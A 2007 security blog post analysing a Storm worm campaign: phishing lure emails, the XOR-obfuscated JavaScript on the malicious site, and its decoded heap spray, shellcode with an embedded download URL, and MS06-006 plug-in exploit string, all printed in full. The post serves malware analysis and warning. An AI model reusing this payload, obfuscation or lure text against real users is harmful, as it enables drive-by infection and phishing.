Thursday, August 23, 2007

The Ever Changing Storm

Storm worm just keeps rolling with the punches. After you warn users, family and friends about the bogus messages and how to identify them, Storm changes it up. This time, they learned that users might not click on an IP address so they've obfuscated it with HTML.

Welcome,

We are glad you joined Free Ringtones.

Account Number: 895942644
Login ID: user2662
Your Password ID: zi461

For security purposes please login and change the temporary Login ID and Password.

Click on the secure link or paste it to your browser: Free Ringtones

Thank You,
Welcome Department
Free Ringtones

Or

OMG, what are you doing man. This video of you is all over the net. check it out yourself http://www.youtube.com/watch?v=pQoPSGAGXMW

or...there's just too many to include. It's quite amazing. When the messages were pr0n related with subjects like "Do you think my bra is too tight. Maybe I should take it off. let me know what you think" and "Oh man I found these pictures of my ex-secretary on her computer after I fired her. Check em out!", they all had the following in their header:

X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

The new membership e-mails don't have any mail client info. The Storm worm host directed to by the e-mail does have some obfuscated javascript with exploit payload. Note: some of this code is going to scroll off the screen. I just couldn't figure out an elegant way of doing it so it's just gonna look like crap. ;-)

<img src="http://www.youtube.com/img/pic_youtubelogo_123x63.gif">
<br><br>Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can <a href="/video.exe">click here</a> to launch the download and then press Run.

<Script Language='JavaScript'>

function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; }

var plain_str = "\xb3\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\xaf\xdb\xc7\xde\xdf\xad\xaf\xdb\xd6\xd2\xd7\xad\xaf\xc0\xd0\xc1\xda\xc3\xc7\xad\xe5\xf2\xe1\xb3\xe0\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb1\xba\xa8\xf7\xfc\xe8\xe0\xb8\xae\xe0\xa8\xee\xe4\xfb\xfa\xff\xf6\xbb\xe0\xbd\xff\xf6\xfd\xf4\xe7\xfb\xaf\xa3\xeb\xa3\xaa\xa3\xa3\xa3\xa3\xa3\xba\xa8\xe0\xb8\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa6\xa7\xd6\xd1\xb6\xe6\xa4\xa6\xab\xd1\xb6\xe6\xab\xd1\xa0\xd0\xb6\xe6\xa0\xa6\xa4\xa7\xb6\xe6\xa3\xa0\xa4\xab\xb6\xe6\xa6\xa5\xd5\xa6\xb6\xe6\xa4\xa5\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa3\xb6\xe6\xa0\xa0\xd5\xa6\xb6\xe6\xa7\xaa\xd0\xaa\xb6\xe6\xd2\xd7\xa7\xa2\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa3\xd5\xa0\xa5\xb6\xe6\xa2\xa7\xd1\xd6\xb6\xe6\xa0\xab\xa1\xab\xb6\xe6\xa4\xa7\xd5\xa1\xb6\xe6\xd0\xa2\xa3\xab\xb6\xe6\xa3\xd7\xd0\xd1\xb6\xe6\xd7\xd2\xa3\xa0\xb6\xe6\xd6\xd1\xa7\xa3\xb6\xe6\xa0\xd1\xd6\xd5\xb6\xe6\xa4\xa6\xd7\xd5\xb6\xe6\xa6\xd6\xd6\xa4\xb6\xe6\xa6\xd6\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa7\xb6\xe6\xa5\xa5\xd7\xd7\xb6\xe6\xa3\xd0\xab\xd1\xb6\xe6\xab\xd1\xa7\xd1\xb6\xe6\xa2\xd0\xa6\xd6\xb6\xe6\xd7\xd7\xa3\xa0\xb6\xe6\xa3\xa7\xab\xd1\xb6\xe6\xa3\xa0\xab\xd1\xb6\xe6\xd0\xa0\xd0\xa6\xb6\xe6\xa4\xa1\xa4\xa6\xb6\xe6\xa5\xd7\xa5\xd0\xb6\xe6\xa5\xd6\xa5\xd5\xb6\xe6\xa5\xa7\xa1\xd6\xb6\xe6\xa5\xd0\xa5\xd0\xb6\xe6\xa7\xa0\xa3\xa3\xb6\xe6\xa6\xd0\xa0\xd2\xb6\xe6\xa1\xd6\xa6\xa6\xb6\xe6\xa4\xab\xa5\xa6\xb6\xe6\xa3\xa3\xa5\xa6\xb6\xe6\xd0\xa3\xa0\xa0\xb6\xe6\xa3\xa0\xa5\xa7\xb6\xe6\xa0\xa3\xa7\xa3\xb6\xe6\xa3\xd0\xa4\xab\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd1\xa3\xd0\xb6\xe6\xa2\xd0\xa4\xa3\xb6\xe6\xab\xd1\xd2\xd7\xb6\xe6\xa3\xab\xa7\xa3\xb6\xe6\xa3\xaa\xd6\xd1\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd7\xa0\xa7\xb6\xe6\xa4\xd0\xa7\xa3\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xaa\xa6\xa0\xd0\xb6\xe6\xab\xd6\xd1\xd5\xb6\xe6\xa3\xd6\xa7\xd6\xb6\xe6\xd6\xab\xd6\xd0\xb6\xe6\xd5\xd5\xab\xa7\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd6\xd0\xab\xa0\xb6\xe6\xab\xa0\xa3\xa7\xb6\xe6\xa1\xa7\xa1\xd0\xb6\xe6\xd5\xd5\xa0\xd0\xb6\xe6\xaa\xa6\xd7\xa3\xb6\xe6\xd1\xd5\xa6\xa3\xb6\xe6\xa2\xd2\xa0\xa5\xb6\xe6\xa4\xa3\xa1\xd5\xb6\xe6\xa5\xd5\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xd1\xd5\xd5\xb6\xe6\xa1\xa7\xa6\xa7\xb6\xe6\xab\xd7\xd5\xd0\xb6\xe6\xd1\xd2\xa6\xa1\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa6\xa0\xa6\xa0\xb6\xe6\xd6\xd1\xa6\xa1\xb6\xe6\xa6\xa0\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xd1\xd5\xa6\xd7\xb6\xe6\xd5\xd6\xaa\xab\xb6\xe6\xa3\xd6\xab\xd2\xb6\xe6\xa6\xa0\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xa0\xd5\xd5\xb6\xe6\xa3\xa7\xd6\xd0\xb6\xe6\xa1\xd0\xab\xa0\xb6\xe6\xa5\xa1\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xa4\xd6\xd1\xd5\xb6\xe6\xd6\xa1\xd7\xab\xb6\xe6\xd6\xab\xa4\xa0\xb6\xe6\xd5\xd5\xa7\xa3\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd5\xd5\xa6\xa1\xb6\xe6\xd6\xab\xd7\xa3\xb6\xe6\xd5\xd5\xd7\xa4\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xa4\xa7\xa5\xab\xb6\xe6\xa4\xa3\xa4\xa7\xb6\xe6\xa1\xd5\xa0\xd2\xb6\xe6\xa0\xab\xa1\xd5\xb6\xe6\xa1\xd6\xa0\xaa\xb6\xe6\xa0\xa0\xa0\xa7\xb6\xe6\xa0\xa2\xa1\xd6\xb6\xe6\xa0\xa5\xa0\xaa\xb6\xe6\xa0\xa6\xa1\xd6\xb6\xe6\xa5\xa5\xa1\xd5\xb6\xe6\xa5\xd0\xa5\xaa\xb6\xe6\xa1\xd6\xa5\xa6\xb6\xe6\xa5\xab\xa4\xa3\xb6\xe6\xa3\xa3\xa4\xa3\xb1\xba\xa8\xaf\xbc\xc0\xd0\xc1\xda\xc3\xc7\xad\xaf\xbc\xdb\xd6\xd2\xd7\xad\xaf\xd1\xdc\xd7\xca\xad\xaf\xd6\xde\xd1\xd6\xd7\xb3\xc0\xc1\xd0\xae\xb1\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xd2\xd2\xd2\xd2\xd1\xd1\xd1\xd1\xd0\xd0\xd0\xd0\xd7\xd7\xd7\xd7\xd6\xd6\xd6\xd6\xd5\xd5\xd5\xd5\xd4\xd4\xd4\xd4\xdb\xdb\xdb\xdb\xda\xda\xda\xda\xd9\xd9\xd9\xd9\xd8\xd8\xd8\xd8\xdf\xdf\xdf\xdf\xd2\xd2\xd2\x96\xdd\xdd\xdd\xdd\xdc\xdc\xdc\xdc\xd2\xd2\xd2\x96\xc2\xc2\xc2\xc2\xc1\xc1\xc1\xc1\xc0\xc0\xc0\xc0\xc7\xc7\xc7\xc7\xc6\xc6\xc6\xc6\xc5\xc5\xc5\xc5\xc4\xc4\xc4\xc4\xcb\xcb\xcb\xcb\xca\xca\xca\xca\xc9\xc9\xc9\xc9\xa3\xa3\xa3\xa3\xa2\xa2\xa2\xa2\xa1\xa1\xa1\xa1\xa0\xa0\xa0\xa0\xa7\xa7\xa7\xa7\xa6\xa6\xa6\xa6\xa5\xa5\xa5\xa5\xa4\xa4\xa4\xa4\xab\xab\xab\xab\xaa\xaa\xaa\xaa\xbd\xe4\xfe\xe5\xb1\xad\xaf\xbc\xd6\xde\xd1\xd6\xd7\xad\xaf\xbc\xd1\xdc\xd7\xca\xad\xaf\xbc\xdb\xc7\xde\xdf\xad\xb3";

var xored_str = xor_str(plain_str, 147);

document.write(xored_str);
</script>

Which gets decoded as:


<SCRIPT>
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do{s+=s;}while(s.length<0x0900000);
s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u382F%u2E39%u3334%u312E%u3639%u352E%u662F%u6C69%u2E65%u6870%u0070");
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv">
</EMBED>


In that last bit, the variable "s" starts with "AAAAAAAA". Then, the do/while loop takes the "s" variable and adds itself to itself 9,437,184 times (0x0900000). After you get 75,497,472 "A"s, it adds shellcode to the end. Redirecting the shellcode to a file and running the file command on it returns "/tmp/js1.sploit: MS-DOS executable (COM)".

The final part of the decoded page might look familiar....if not, check out Windows Media Player Plug-in for Non-Microsoft Browsers Code Execution (MS06-006) - Exploit II.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)